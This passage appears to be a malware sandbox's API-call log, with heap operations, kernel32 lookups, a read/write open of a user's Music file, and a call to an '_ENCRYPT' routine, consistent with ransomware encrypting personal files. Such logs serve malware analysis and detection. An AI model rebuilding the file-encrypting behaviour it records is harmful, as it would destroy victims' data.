HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", cchWideChar=65, lpMultiByteStr=0x9aa4f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", lpUsedDefaultChar=0x0) returned 65 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.213] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\cem-br.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0181.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x82) returned 0x8feba8 [0181.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=65, lpWideCharStr=0x8feba8, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a") returned 65 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0181.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0181.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0181.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.216] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0181.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0181.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.218] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0181.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0181.219] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0181.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0181.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0181.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0181.220] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0181.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.221] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0181.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd5d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0181.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.221] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0181.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0181.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0181.222] CloseHandle (hObject=0x120) returned 1 [0181.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0181.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.222] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0181.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.223] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0181.223] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.223] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 